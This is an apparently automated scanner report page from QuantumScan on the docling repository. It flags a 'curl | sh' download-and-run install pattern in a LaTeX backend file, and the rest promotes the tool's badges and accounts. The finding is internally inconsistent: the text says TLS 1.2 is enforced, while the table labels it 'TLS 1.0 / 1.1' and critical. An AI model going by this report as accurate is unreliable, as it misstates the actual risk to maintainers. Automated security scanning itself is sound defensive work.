QuantumScan
docling-project/docling
The repository contains one critical finding related to the use of a curl command that explicitly allows TLS 1.2 but is part of a shell script download pattern that could be manipulated. While the command itself enforces TLS 1.2 (not 1.0/1.1), the use of 'curl | sh' for installing external dependencies presents a supply chain risk. This is a LaTeX backend engine component with moderate business impact if compromised.
| File | Algorithm | Severity | |
|---|---|---|---|
| docling/backend/latex/engines/tectonic.py:86 | TLS 1.0 / 1.1 | criticalBusiness impact 45 |
Anyone with this link can view the risk score and top findings — no sign-in required. Source code stays private.
https://quantumscan.io/en/share/08229c4f-34e6-4c48-902f-6349e6b5f83fShow your project's post-quantum readiness in the README. The badge updates automatically after every new scan.
[](https://github.com/docling-project/docling)<a href="https://github.com/docling-project/docling"><img src="https://quantumscan.io/api/badge/docling-project/docling.svg" alt="Post-Quantum Readiness" /></a>Add badge to your README
Show your quantum-safety score directly on GitHub.
[](https://quantumscan.io/en/scan/08229c4f-34e6-4c48-902f-6349e6b5f83f)Save your results & track future changes
Create a free account to get drift alerts, compliance PDF exports, and scan history.
- Weekly drift alerts when new vulnerabilities appear
- Track risk score over time across all your repos
- Export DORA / NIS2 compliance PDF for auditors
Free forever for design partners · No credit card